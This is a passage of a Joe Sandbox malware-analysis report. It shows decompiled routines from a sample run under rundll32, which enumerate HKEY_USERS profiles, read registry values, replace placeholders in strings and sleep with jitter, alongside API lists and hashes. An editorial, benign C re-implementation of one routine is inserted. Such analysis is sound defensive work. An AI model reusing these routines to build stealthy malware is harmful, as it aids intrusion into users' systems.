                                      					__imp__(_a8, _t45); // @04de2541  unresolved import in the decompilation; the API list resolves this call site to lstrlen(_a8)
                                      					_v16 = _t28; // @04de254a  needle length (the lstrlen result)
                                      					_t57 = StrStrA(_t56, _a8); // @04de2554  first occurrence of the needle
                                      					if(_t57 != 0) { // @04de2558
                                      						 *_t46 = _v5; // @04de255d  restore the saved byte (only done on a hit)
                                      						_t33 = RtlAllocateHeap( *0x4dea2d8, 0, _a16 + _t60); // executed @04de256d  heap handle from a global; new size = old length + replacement length
                                      						_t48 = _t33; // @04de2573
                                      						if(_t48 == 0) { // @04de2577
                                      							_v12 = 8; // @04de25c6  8 = ERROR_NOT_ENOUGH_MEMORY
                                      						} else { // @04de2579
                                      							_t58 = _t57 - _a4; // @04de2579  offset of the match (_t58 is not declared in the decompilation)
                                      							E04DE799E(_t57 - _a4, _a4, _t48); // @04de2582  copy helper taking (length, src, dst) and returning dst: bytes before the match
                                      							_t38 = E04DE799E(_a16, _a12, _t58 + _t48); // @04de2591  the _a16-byte replacement at the match offset
                                      							_t53 = _v16; // @04de2596
                                      							_t59 = _a16; // @04de25a3
                                      							E04DE799E(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59); // @04de25ac  everything after the needle
                                      							 *_a20 = _t48; // @04de25b7  output buffer
                                      							_v12 = _v12 & 0x00000000; // @04de25be  status 0 = success
                                      							 *_a24 = _t60 - _v16 + _t59; // @04de25c2  output length = old length - needle length + replacement length
                                      						} // @04de25c2
                                      					} // @04de2577
                                      				} // @04de25cd
                                      				return _v12; // @04de25d4
                                      			}

                                      APIs
                                      • lstrlen.KERNEL32(7705F710,?,00000000,?,7705F710), ref: 04DE2541
                                      • StrStrA.SHLWAPI(00000000,?), ref: 04DE254E
                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 04DE256D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHeaplstrlen
                                      • String ID: FNwPq
                                      • API String ID: 556738718-3591455833
                                      • Opcode ID: cb709af536a24274b497fee9cc78b9192c67be9ce724306771b490acf0111c17
                                      • Instruction ID: d690b7aa0db3867367fede7421c48d7fa2a9c0df46f965420629f2f70198bf80
                                      • Opcode Fuzzy Hash: cb709af536a24274b497fee9cc78b9192c67be9ce724306771b490acf0111c17
                                      • Instruction Fuzzy Hash: 32215E3660020AAFDB11EF69C994BAEBFB9EF85314F148191EC44AB305D735E915CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%
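                                      The routine E04DE250D above is easier to reason about in a clean form. The block below is an added, editorial re-implementation of what the decompiled code does; it is not the sample's code and not Joe Sandbox output. The function and variable names (replace_first_occurrence, demo_matches), the status macros and the sample strings are the editor's; the status values 0, 8 (ERROR_NOT_ENOUGH_MEMORY) and 0xb (ERROR_BAD_FORMAT) are the ones the decompiled routine returns. libc strstr, memcpy and malloc stand in for StrStrA, E04DE799E and RtlAllocateHeap so the example builds and runs off Windows; it also keeps the two quirks visible in the listing (the search is bounded by NUL-ing the buffer's last byte, and the output allocation is larger than the result needs).

```c
/* Added example (editorial, not the sample's code or Joe Sandbox output):
 * a readable re-implementation of what E04DE250D does. Names, macros and
 * sample strings are the editor's; the status values are the routine's. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ERR_SUCCESS           0     /* ERROR_SUCCESS */
#define ERR_NOT_ENOUGH_MEMORY 8     /* ERROR_NOT_ENOUGH_MEMORY: allocation failed */
#define ERR_BAD_FORMAT        0xb   /* ERROR_BAD_FORMAT: needle not found / bad arguments */

/* Replace the first occurrence of `needle` inside the `len`-byte buffer `buf`
 * with the `repl_len`-byte block `repl`; the result is a new heap buffer
 * returned through *out with its length in *out_len.
 * Mirrors E04DE250D(len, buf, needle, repl, repl_len, out, out_len):
 *  - the search is bounded by temporarily writing a NUL over buf[len-1], so a
 *    match can never include the last byte of buf;
 *  - the output allocation is len + repl_len bytes, needle_len more than needed. */
unsigned int replace_first_occurrence(size_t len, char *buf, const char *needle,
                                      const char *repl, size_t repl_len,
                                      char **out, size_t *out_len)
{
    if (buf == NULL || len == 0 || needle == NULL)
        return ERR_BAD_FORMAT;

    char *last = buf + (len - 1);
    char saved = *last;
    *last = '\0';                             /* bound the search */
    size_t needle_len = strlen(needle);       /* lstrlen(_a8) in the original */
    char *hit = strstr(buf, needle);          /* StrStrA(_a4, _a8) */
    *last = saved;                            /* the original restores it only on a hit; always restore here */
    if (hit == NULL)
        return ERR_BAD_FORMAT;

    char *dst = malloc(len + repl_len);       /* RtlAllocateHeap(heap, 0, _a16 + len) */
    if (dst == NULL)
        return ERR_NOT_ENOUGH_MEMORY;

    size_t prefix = (size_t)(hit - buf);
    memcpy(dst, buf, prefix);                                     /* bytes before the match */
    memcpy(dst + prefix, repl, repl_len);                         /* the replacement */
    memcpy(dst + prefix + repl_len, hit + needle_len,             /* the tail, skipping the needle */
           len - prefix - needle_len);
    *out = dst;
    *out_len = len - needle_len + repl_len;
    return ERR_SUCCESS;
}

/* Self-check helper: run one replacement over a constructed sample (passed as
 * an explicit length without its NUL, the way the original is called) and
 * return 1 if the result equals `expected`, 0 if it differs, or the negated
 * status code if the replacement failed. */
int demo_matches(const char *sample, const char *needle, const char *repl, const char *expected)
{
    char buf[128];
    size_t len = strlen(sample);
    if (len == 0 || len >= sizeof buf)
        return -1;
    memcpy(buf, sample, len);                 /* deliberately no trailing NUL */

    char *out = NULL;
    size_t out_len = 0;
    unsigned int rc = replace_first_occurrence(len, buf, needle, repl, strlen(repl), &out, &out_len);
    if (rc != ERR_SUCCESS)
        return -(int)rc;
    int ok = out_len == strlen(expected) && memcmp(out, expected, out_len) == 0;
    free(out);
    return ok;
}

int main(void)
{
    /* Constructed sample input, not taken from the report. */
    printf("%d\n", demo_matches("user=%USER%;host=%HOST%;", "%USER%", "alice",
                                "user=alice;host=%HOST%;"));
    /* A needle that ends on the buffer's last byte is never found, because that
     * byte is NUL during the search: the status is ERROR_BAD_FORMAT. */
    printf("%d\n", demo_matches("host=%HOST%", "%HOST%", "203.0.113.7", ""));
    return 0;
}
```

The second call in main is the edge case worth knowing when matching this routine against captured data: a placeholder that sits flush at the end of the input is reported as "not found" (status 0xb), not replaced.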

                                      APIs
                                      • SysAllocString.OLEAUT32(80000002), ref: 04DE105D
                                      • SysAllocString.OLEAUT32(04DE6ECE), ref: 04DE10A1
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE10B5
                                      • SysFreeString.OLEAUT32(00000000), ref: 04DE10C3
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFree
                                      • String ID:
                                      • API String ID: 344208780-0
                                      • Opcode ID: 13114f0dadd8fded86f5b6ee92e81db45a9c6b3d83774b0dd22723a6eb282b74
                                      • Instruction ID: ae3d0a4dc5786d51edd0c0cdb350239185028685c933371260d16e32058338b2
                                      • Opcode Fuzzy Hash: 13114f0dadd8fded86f5b6ee92e81db45a9c6b3d83774b0dd22723a6eb282b74
                                      • Instruction Fuzzy Hash: 39312171B00259EFCB15EF99D4909BE7BB9FF48300B10841EF9069B250D735AA41CF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			// Annotations: the trailing "@04de...." markers are the report's own per-line instruction addresses,
                                      			// folded in from the address column that the report prints after the listing; the other comments are
                                      			// editorial. The routine enumerates the subkeys of HKEY_USERS (one per loaded user profile) and hands
                                      			// each subkey name to E04DE6E20, giving up early once a global event becomes signalled.
                                      			E04DE737F(void* __ecx, intOrPtr _a4) {
                                      				int* _v8;
                                      				int _v12;
                                      				int* _v16;
                                      				int _v20;
                                      				int* _v24;
                                      				char* _v28;
                                      				void* _v32;
                                      				long _t33;
                                      				char* _t35;
                                      				long _t39;
                                      				long _t42;
                                      				intOrPtr _t47;
                                      				void* _t51;
                                      				long _t53;
                                      
                                      				_t51 = __ecx; // @04de737f
                                      				_v8 = 0; // @04de7399  subkey index for RegEnumKeyExA
                                      				_v16 = 0; // @04de739c
                                      				_v12 = 0; // @04de739f
                                      				_v24 = 0; // @04de73a2
                                      				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed @04de73a5  0x80000003 = HKEY_USERS, no subkey, 0x20019 = KEY_READ
                                      				_t53 = _t33; // @04de73ab
                                      				if(_t53 != 0) { // @04de73af
                                      					L18: // @04de7489
                                      					return _t53; // @04de748d
                                      				} // @04de748d
                                      				_t53 = 8; // @04de73b8  8 = ERROR_NOT_ENOUGH_MEMORY, the result if the allocation below fails
                                      				_t35 = E04DE4DF6(0x104); // @04de73bf  heap-allocate 0x104 = 260 (MAX_PATH) bytes for the subkey name (RtlAllocateHeap, see API list)
                                      				_v28 = _t35; // @04de73c4
                                      				if(_t35 == 0) { // @04de73c9
                                      					L17: // @04de747e
                                      					RegCloseKey(_v32); // executed @04de7481
                                      					goto L18;
                                      				} // @04de7487
                                      				_v20 = 0x104; // @04de73cf
                                      				do { // @04de73d2
                                      					_v16 = _v20; // @04de73d9
                                      					_v12 = 0x104; // @04de73e3  in/out: size of the name buffer in characters
                                      					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed @04de73ec  name of the subkey at index _v8
                                      					_t53 = _t39; // @04de73f2
                                      					if(_t53 != 0xea) { // @04de73fa  0xea = ERROR_MORE_DATA
                                      						if(_t53 != 0) { // @04de7432
                                      							L14: // @04de746c
                                      							if(_t53 == 0x103) { // @04de7472  0x103 = ERROR_NO_MORE_ITEMS: end of the enumeration is reported as success
                                      								_t53 = 0; // @04de7474
                                      							} // @04de7474
                                      							L16: // @04de7476
                                      							E04DE4C73(_v28); // @04de7479  free the name buffer
                                      							goto L17;
                                      						} // @04de7479
                                      						_t42 = E04DE6E20(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed @04de7447  per-subkey handler: gets the key handle, the name and its length, and the index by address
                                      						_t53 = _t42; // @04de744c
                                      						if(_t53 != 0) { // @04de7450  a non-zero result from the handler ends the enumeration
                                      							goto L14;
                                      						}
                                      						goto L12;
                                      					} // @04de7450
                                      					if(_v12 <= 0x104) { // @04de73ff  ERROR_MORE_DATA path: free and reallocate the secondary buffer _v24 at size _v16
                                      						if(_v16 <= _v20) { // @04de740e
                                      							goto L16;
                                      						}
                                      						E04DE4C73(_v24); // @04de7413
                                      						_v20 = _v16; // @04de741c
                                      						_t47 = E04DE4DF6(_v16); // @04de741f
                                      						_v24 = _t47; // @04de7424
                                      						if(_t47 != 0) { // @04de7429
                                      							L6: // @04de7404
                                      							_t53 = 0; // @04de7404
                                      							goto L12;
                                      						} // @04de7404
                                      						_t53 = 8; // @04de742d  allocation failed
                                      						goto L16;
                                      					} // @04de742d
                                      					_v8 = _v8 + 1; // @04de7401  the name did not fit the 260-byte buffer: advance the index and skip this subkey
                                      					goto L6;
                                      					L12: // @04de7452
                                      				} while (WaitForSingleObject( *0x4dea30c, 0) == 0x102); // @04de745f  zero timeout polls the global event at 0x4dea30c; 0x102 = WAIT_TIMEOUT, so the loop runs only while that event is not signalled
                                      				goto L16;
                                      			}

                                      APIs
                                      • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04DE2A82,?), ref: 04DE73A5
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • RegEnumKeyExA.KERNEL32(?,?,?,04DE2A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04DE2A82), ref: 04DE73EC
                                      • WaitForSingleObject.KERNEL32(00000000,?,?,?,04DE2A82,?,04DE2A82,?,?,?,?,?,04DE2A82,?), ref: 04DE7459
                                      • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04DE2A82,?), ref: 04DE7481
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                      • String ID:
                                      • API String ID: 3664505660-0
                                      • Opcode ID: 34ff792123686a3a585ac8b62893f27cceef6063db0e12dfce9717bf02fa474c
                                      • Instruction ID: 83ff28df0eec3cce5fbaa1ae9cca1057b15ae6b17a9679c5fdddd66f62a68e15
                                      • Opcode Fuzzy Hash: 34ff792123686a3a585ac8b62893f27cceef6063db0e12dfce9717bf02fa474c
                                      • Instruction Fuzzy Hash: 38314971D00119ABDF22BFAAD8448FFFFB9FB84310F108126E951B6260D2746A40DBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 41%
                                      			E04DE29F2(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                      				intOrPtr _v12;
                                      				void* _v16;
                                      				void* _v28;
                                      				char _v32;
                                      				void* __esi;
                                      				void* _t20;
                                      				void* _t26;
                                      				void* _t29;
                                      				void* _t38;
                                      				signed int* _t39;
                                      				void* _t40;
                                      
                                      				_t36 = __ecx;
                                      				_v32 = 0;
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				_v12 = _a4;
                                      				_t20 = E04DE6174(__ecx,  &_v32); // executed
                                      				_t38 = _t20;
                                      				if(_t38 != 0) {
                                      					L12:
                                      					_t39 = _a8;
                                      					L13:
                                      					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                      						_t23 =  &(_t39[1]);
                                      						if(_t39[1] != 0) {
                                      							E04DE75C6(_t23);
                                      						}
                                      					}
                                      					return _t38;
                                      				}
                                      				_t26 = E04DE6955(0x40,  &_v16); // executed
                                      				if(_t26 != 0) {
                                      					_v16 = 0;
                                      				}
                                      				_t40 = CreateEventA(0x4dea34c, 1, 0,  *0x4dea3e4);
                                      				if(_t40 != 0) {
                                      					SetEvent(_t40);
                                      					Sleep(0xbb8); // executed
                                      					CloseHandle(_t40);
                                      				}
                                      				_push( &_v32);
                                      				if(_a12 == 0) {
                                      					_t29 = E04DE737F(_t36); // executed
                                      				} else {
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_push(0);
                                      					_t29 = E04DE6E20(_t36);
                                      				}
                                      				_t41 = _v16;
                                      				_t38 = _t29;
                                      				if(_v16 != 0) {
                                      					E04DE5147(_t41);
                                      				}
                                      				if(_t38 != 0) {
                                      					goto L12;
                                      				} else {
                                      					_t39 = _a8;
                                      					_t38 = E04DE1666( &_v32, _t39);
                                      					goto L13;
                                      				}
                                      			}

                                      Instruction addresses for the listing above: 0x04de29f2, 0x04de29ff, 0x04de2a05, 0x04de2a06, 0x04de2a07, 0x04de2a08, 0x04de2a09, 0x04de2a0d, 0x04de2a14, 0x04de2a19, 0x04de2a1d, 0x04de2aa5, 0x04de2aa5, 0x04de2aa8, 0x04de2aaa, 0x04de2ab2, 0x04de2ab8, 0x04de2abb, 0x04de2abb, 0x04de2ab8, 0x04de2ac6, 0x04de2ac6, 0x04de2a29, 0x04de2a30, 0x04de2a32, 0x04de2a32, 0x04de2a49, 0x04de2a4d, 0x04de2a50, 0x04de2a5b, 0x04de2a62, 0x04de2a62, 0x04de2a6b, 0x04de2a6f, 0x04de2a7d, 0x04de2a71, 0x04de2a71, 0x04de2a72, 0x04de2a73, 0x04de2a74, 0x04de2a75, 0x04de2a76, 0x04de2a76, 0x04de2a82, 0x04de2a85, 0x04de2a89, 0x04de2a8b, 0x04de2a8b, 0x04de2a92, 0x00000000, 0x04de2a94, 0x04de2a94, 0x04de2aa1, 0x00000000, 0x04de2aa1

                                      APIs
                                      • CreateEventA.KERNEL32(04DEA34C,00000001,00000000,00000040,?,?,7705F710,00000000,7705F730), ref: 04DE2A43
                                      • SetEvent.KERNEL32(00000000), ref: 04DE2A50
                                      • Sleep.KERNEL32(00000BB8), ref: 04DE2A5B
                                      • CloseHandle.KERNEL32(00000000), ref: 04DE2A62
                                        • Part of subcall function 04DE737F: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04DE2A82,?), ref: 04DE73A5
                                        • Part of subcall function 04DE737F: RegEnumKeyExA.KERNEL32(?,?,?,04DE2A82,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04DE2A82), ref: 04DE73EC
                                        • Part of subcall function 04DE737F: WaitForSingleObject.KERNEL32(00000000,?,?,?,04DE2A82,?,04DE2A82,?,?,?,?,?,04DE2A82,?), ref: 04DE7459
                                        • Part of subcall function 04DE737F: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04DE2A82,?), ref: 04DE7481
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                      • String ID:
                                      • API String ID: 891522397-0
                                      • Opcode ID: 311386779caf037cad9f13c4a4527e917f11531a5f2ab09df94ce21d7e6d70ee
                                      • Instruction ID: 7b495b60e7e36c1d8b190012cd1c0b583dd8a86f7e5139f402b8e4b4a8c7083c
                                      • Opcode Fuzzy Hash: 311386779caf037cad9f13c4a4527e917f11531a5f2ab09df94ce21d7e6d70ee
                                      • Instruction Fuzzy Hash: 2E2195B2E00219ABDF20BFE7C8848FE77ADFF48354B4444A5EA11A7100D774BA459B70
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE4E0B(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                                      				long _t26;
                                      				intOrPtr* _t38;
                                      				char* _t42;
                                      				long _t43;
                                      
                                      				if(_a4 == 0) {
                                      					L2:
                                      					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                                      					_t43 = _t26;
                                      					if(_t43 == 0) {
                                      						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                                      						if(_a4 == 0) {
                                      							_t43 = 0xe8;
                                      						} else {
                                      							_t42 = E04DE4DF6(_a4);
                                      							if(_t42 == 0) {
                                      								_t43 = 8;
                                      							} else {
                                      								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                                      								if(_t43 != 0) {
                                      									E04DE4C73(_t42);
                                      								} else {
                                      									 *_a20 = _t42;
                                      									_t38 = _a24;
                                      									if(_t38 != 0) {
                                      										 *_t38 = _a4;
                                      									}
                                      								}
                                      							}
                                      						}
                                      						RegCloseKey(_a12); // executed
                                      					}
                                      					L12:
                                      					return _t43;
                                      				}
                                      				_t43 = E04DE7849(_a4, _a8, _a12, _a16, _a20, _a24);
                                      				if(_t43 == 0) {
                                      					goto L12;
                                      				}
                                      				goto L2;
                                      			}

                                      Instruction addresses for the listing above: 0x04de4e17, 0x04de4e3a, 0x04de4e44, 0x04de4e4a, 0x04de4e4e, 0x04de4e66, 0x04de4e6b, 0x04de4eb3, 0x04de4e6d, 0x04de4e75, 0x04de4e79, 0x04de4eb0, 0x04de4e7b, 0x04de4e8d, 0x04de4e91, 0x04de4ea7, 0x04de4e93, 0x04de4e96, 0x04de4e98, 0x04de4e9d, 0x04de4ea2, 0x04de4ea2, 0x04de4e9d, 0x04de4e91, 0x04de4e79, 0x04de4ebb, 0x04de4ebb, 0x04de4ec2, 0x04de4ec8, 0x04de4ec8, 0x04de4e30, 0x04de4e34, 0x00000000, 0x00000000, 0x00000000

                                      APIs
                                      • RegOpenKeyW.ADVAPI32(80000002,054A9EC2,054A9EC2), ref: 04DE4E44
                                      • RegQueryValueExW.KERNEL32(054A9EC2,?,00000000,80000002,00000000,00000000,?,04DE6EFF,3D04DE90,80000002,04DE2A82,00000000,04DE2A82,?,054A9EC2,80000002), ref: 04DE4E66
                                      • RegQueryValueExW.ADVAPI32(054A9EC2,?,00000000,80000002,00000000,00000000,00000000,?,04DE6EFF,3D04DE90,80000002,04DE2A82,00000000,04DE2A82,?,054A9EC2), ref: 04DE4E8B
                                      • RegCloseKey.KERNEL32(054A9EC2,?,04DE6EFF,3D04DE90,80000002,04DE2A82,00000000,04DE2A82,?,054A9EC2,80000002,00000000,?), ref: 04DE4EBB
                                        • Part of subcall function 04DE7849: SafeArrayDestroy.OLEAUT32(00000000), ref: 04DE78D1
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                      • String ID:
                                      • API String ID: 486277218-0
                                      • Opcode ID: 246d0d52dcf9ffbba867ba705c1995a87a9b356282224ef75d161c76a1dad133
                                      • Instruction ID: d647195dcfe427df8efd9175e0ccb65f0cd4b2c46159f994717105d0b7809464
                                      • Opcode Fuzzy Hash: 246d0d52dcf9ffbba867ba705c1995a87a9b356282224ef75d161c76a1dad133
                                      • Instruction Fuzzy Hash: 8421597350011ABFDF21AE96DD808FE7BA9FB08754B018025FE049B220D631AD60ABA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 65%
                                      			E04DE39B5(void* __ecx, intOrPtr _a4) {
                                      				struct _FILETIME _v12;
                                      				int _t13;
                                      				signed int _t16;
                                      				void* _t18;
                                      				signed int _t19;
                                      				unsigned int _t23;
                                      				void* _t30;
                                      				signed int _t34;
                                      
                                      				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                      				asm("stosd");
                                      				do {
                                      					_t13 = SwitchToThread();
                                      					GetSystemTimeAsFileTime( &_v12);
                                      					_t23 = _v12.dwHighDateTime;
                                      					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                      					_push(0);
                                      					_push(0x13);
                                      					_push(_t23 >> 5);
                                      					_push(_t16);
                                      					L04DE8326();
                                      					_t34 = _t16 + _t13;
                                      					_t18 = E04DE54D5(_a4, _t34);
                                      					_t30 = _t18;
                                      					_t19 = 3;
                                      					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                      				} while (_t30 == 1);
                                      				return _t30;
                                      			}

                                      Instruction addresses for the listing above: 0x04de39ba, 0x04de39c5, 0x04de39c6, 0x04de39c6, 0x04de39d2, 0x04de39db, 0x04de39de, 0x04de39e2, 0x04de39e4, 0x04de39e9, 0x04de39ea, 0x04de39eb, 0x04de39f5, 0x04de39f8, 0x04de39ff, 0x04de3a03, 0x04de3a0a, 0x04de3a10, 0x04de3a1a

                                      APIs
                                      • SwitchToThread.KERNEL32(?,00000001,?,?,?,04DE3D61,?,?), ref: 04DE39C6
                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04DE3D61,?,?), ref: 04DE39D2
                                      • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04DE39EB
                                        • Part of subcall function 04DE54D5: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 04DE5534
                                      • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04DE3D61,?,?), ref: 04DE3A0A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                                      • String ID:
                                      • API String ID: 1610602887-0
                                      • Opcode ID: 4c56a4ff33aed0b36c52cd4d927bbd6fbbcff538dab9e9eab44a6301dddab106
                                      • Instruction ID: ca32f8b7ffeb3e8b57277fb74f93c54e577d8c41b09404dbb198644c44c721f6
                                      • Opcode Fuzzy Hash: 4c56a4ff33aed0b36c52cd4d927bbd6fbbcff538dab9e9eab44a6301dddab106
                                      • Instruction Fuzzy Hash: 12F0A4B3B00204BBD714AAA5DC2DBEE77B9DB84365F150164F602E7340E678AA008660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 50%
                                      			E04DE68F5(void** __esi) {
                                      				intOrPtr _v0;
                                      				intOrPtr _t4;
                                      				intOrPtr _t6;
                                      				void* _t8;
                                      				void* _t9;
                                      				intOrPtr _t10;
                                      				void* _t11;
                                      				void** _t13;
                                      
                                      				_t13 = __esi;
                                      				_t4 =  *0x4dea3cc; // 0x54a95b0
                                      				__imp__(_t4 + 0x40);
                                      				while(1) {
                                      					_t6 =  *0x4dea3cc; // 0x54a95b0
                                      					_t1 = _t6 + 0x58; // 0x0
                                      					if( *_t1 == 0) {
                                      						break;
                                      					}
                                      					Sleep(0xa);
                                      				}
                                      				_t8 =  *_t13;
                                      				if(_t8 != 0 && _t8 != 0x4dea030) {
                                      					HeapFree( *0x4dea2d8, 0, _t8);
                                      				}
                                      				_t9 = E04DE4117(_v0, _t13); // executed
                                      				_t13[1] = _t9;
                                      				_t10 =  *0x4dea3cc; // 0x54a95b0
                                      				_t11 = _t10 + 0x40;
                                      				__imp__(_t11);
                                      				return _t11;
                                      			}

                                      Instruction addresses for the listing above: 0x04de68f5, 0x04de68f5, 0x04de68fe, 0x04de690e, 0x04de690e, 0x04de6913, 0x04de6918, 0x00000000, 0x00000000, 0x04de6908, 0x04de6908, 0x04de691a, 0x04de691e, 0x04de6930, 0x04de6930, 0x04de693b, 0x04de6940, 0x04de6943, 0x04de6948, 0x04de694c, 0x04de6952

                                      APIs
                                      • RtlEnterCriticalSection.NTDLL(054A9570), ref: 04DE68FE
                                      • Sleep.KERNEL32(0000000A), ref: 04DE6908
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE6930
                                      • RtlLeaveCriticalSection.NTDLL(054A9570), ref: 04DE694C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
